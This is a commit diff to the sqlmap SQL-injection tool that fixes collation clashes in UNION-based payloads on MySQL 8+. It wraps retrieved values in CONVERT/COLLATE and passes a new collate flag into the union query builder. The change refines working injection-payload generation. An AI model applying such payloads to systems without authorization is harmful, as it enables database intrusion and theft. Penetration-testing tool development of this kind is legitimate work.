Fixing issues with UNION and COLLATE on MySQL

This commit is contained in:
Miroslav Štampar 2026-06-19 12:11:28 +02:00
parent d5d6fac58d
commit 824ef464e1
5 changed files with 31 additions and 13 deletions

View file

@ -51,6 +51,7 @@ from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import GENERIC_SQL_COMMENT_MARKER
from lib.core.settings import INFERENCE_MARKER
from lib.core.settings import MYSQL_UNION_VALUE_CAST
from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
@ -825,7 +826,7 @@ class Agent(object):
return concatenatedQuery
def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None, collate=False):
"""
Take in input a query (pseudo query) string and return its
processed UNION ALL SELECT query.
@ -867,10 +868,21 @@ class Agent(object):
if query.startswith("SELECT "):
query = query[len("SELECT "):]
# On MySQL 8+ the retrieved value (connection collation) cannot be merged in a
# UNION column with a table column of a different collation (e.g. utf8mb4_0900_ai_ci),
# raising "Illegal mix of collations". Normalizing the charset and forcing an explicit
# collation (highest coercibility) wins the merge (Note: skipped for NULL/numeric values).
# Note: requires the utf8mb4 charset (MySQL >= 5.5.3) used in MYSQL_UNION_VALUE_CAST; on
# older versions there is no such collation clash to begin with (unknown version => assumed recent).
collateField = collate and Backend.isDbms(DBMS.MYSQL) and isDBMSVersionAtLeast('5.5.3') is not False
def _collate(value):
return MYSQL_UNION_VALUE_CAST % value if collateField and value and value != NULL and not value.isdigit() else value
unionQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)
if limited:
unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
unionQuery += ','.join(char if _ != position else _collate('(SELECT %s)' % query) for _ in xrange(0, count))
unionQuery += fromTable
unionQuery = self.suffixQuery(unionQuery, comment, suffix)
@ -900,6 +912,9 @@ class Agent(object):
else:
infoFile = None
if not infoFile:
query = _collate(query)
for element in xrange(0, count):
if element > 0:
unionQuery += ','
@ -928,7 +943,7 @@ class Agent(object):
unionQuery += ','
if element == position:
unionQuery += multipleUnions
unionQuery += _collate(multipleUnions)
else:
unionQuery += char

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.125"
VERSION = "1.10.6.126"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -511,6 +511,9 @@ SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "
# Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10
# Wrapper applied to MySQL UNION-based retrieval values to neutralize "Illegal mix of collations" errors (e.g. utf8mb4_0900_ai_ci tables vs a utf8mb4_general_ci connection on MySQL 8+). CONVERT normalizes the (possibly binary) charset to utf8mb4 and the explicit COLLATE then wins the UNION column merge (highest coercibility)
MYSQL_UNION_VALUE_CAST = "CONVERT(%s USING utf8mb4) COLLATE utf8mb4_bin"
# Minimum range between minimum and maximum of statistical set
MIN_STATISTICAL_RANGE = 0.01

View file

@ -235,7 +235,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, collate=True)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
@ -255,7 +255,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2, collate=True)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
@ -268,7 +268,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable, collate=True)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request

View file

@ -84,12 +84,12 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
except IndexError:
pass
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited, collate=True)
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
else:
injExpression = unescaper.escape(expression)
where = vector[6]
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False, collate=True)
payload = agent.payload(newValue=query, where=where)